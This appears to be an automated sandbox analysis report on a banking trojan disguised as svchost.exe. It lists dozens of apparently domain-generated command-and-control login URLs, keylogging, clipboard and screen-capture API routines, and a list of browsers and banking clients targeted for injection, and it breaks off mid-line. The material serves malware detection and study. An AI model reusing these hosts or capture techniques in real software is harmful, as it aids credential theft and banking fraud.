Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyjuc.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905696441.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonykam.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymoc.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymoc.com/login.phpE
Source: svchost.exe, 00000002.00000003.2498726255.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymuf.com/
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311968303.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310767470.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymuf.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379463124.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2365866545.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2852112632.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373591398.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypic.com/login.php
Source: svchost.exe, 00000002.00000003.2385647048.0000000004061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypom.com/login.phpUUC:
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqym.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341852646.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyrot.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376002854.000000000923B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyryk.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335495212.00000000093E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336882213.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyzac.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2386784820.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2385120826.00000000033EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2697302039.000000000899E000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093A5000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.000000000914B000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 
00000013.00000002.2756051050.0000000009104000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2856769526.0000000008FC3000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2879717907.0000000008887000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2901602167.0000000008BD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://vonyzuf.com/login.php
Source: svchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379463124.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyzut.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612622918.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2631989272.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575537635.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopybok.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopycoc.com/login.php
Source: svchost.exe, 00000002.00000003.2729337658.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2735954545.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyjac.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopykum.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopypec.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426541082.0000000009200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905696441.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyput.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2729337658.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363422290.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363692365.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362592176.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2735954545.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyqef.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3419128942.000000000336B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2927397659.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287763223.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279511546.0000000003369000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928459922.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2915948048.0000000009376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3428117276.00000000092CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2916039850.0000000009374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyrem.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyrik.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649747897.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzot.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2546812858.00000000040F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowybof.com/
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607855494.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2589419124.00000000033EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2609571355.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553803750.00000000033EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowybof.com/login.php

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\apppatch\svchost.exe Code function: [tab]2_2_02C81B80
Source: C:\Windows\apppatch\svchost.exe Code function: [del]2_2_02C81B80
Source: C:\Windows\apppatch\svchost.exe Code function: [ins]2_2_02C81B80
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C81E60 memset,GlobalLock,GetCurrentThreadId,GetGUIThreadInfo,GetOpenClipboardWindow,GetActiveWindow,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GlobalUnlock,GlobalUnlock,2_2_02C81E60
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C78630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_02C78630
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 6_2_01248630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_01248630
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 7_2_01048630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_01048630
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 9_2_00A28630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard,9_2_00A28630
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C93950 GetDesktopWindow,GetWindowDC,CreateCompatibleDC,PathAddBackslashA,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,SelectObject,BitBlt,GetDesktopWindow,GetDC,GetProcessHeap,HeapAlloc,memset,GetDIBits,GetDIBits,WriteFile,ReleaseDC,2_2_02C93950
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C81B80 memset,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapValidate,GetProcessHeap,HeapReAlloc,GetKeyboardState,ToAscii,2_2_02C81B80

E-Banking Fraud

Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|2_2_02C86370
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, 
\chrome.exe2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, 
\iexplore.exe2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInf